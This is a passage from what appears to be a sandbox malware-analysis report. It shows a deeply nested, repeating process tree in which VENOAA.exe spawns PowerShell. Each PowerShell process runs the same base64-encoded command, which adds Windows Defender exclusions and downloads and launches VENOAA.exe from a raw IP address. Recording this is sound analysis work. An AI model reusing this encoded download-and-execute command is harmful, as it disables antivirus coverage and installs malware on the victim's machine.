aAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        158⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        159⤵
        Checks computer location settings
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        160⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        161⤵
        Checks computer location settings
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        162⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        163⤵
        Checks computer location settings
        
        PID:3560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        164⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        165⤵
        Checks computer location settings
        
        PID:3696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        166⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        167⤵
        
        PID:1424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        168⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        169⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        170⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        171⤵
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        172⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        173⤵
        Checks computer location settings
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        174⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        175⤵
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        176⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        177⤵
        
        PID:220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        178⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        179⤵
        Checks computer location settings
        
        PID:4068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        180⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        181⤵
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        182⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        183⤵
        Checks computer location settings
        
        PID:3724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        184⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        185⤵
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
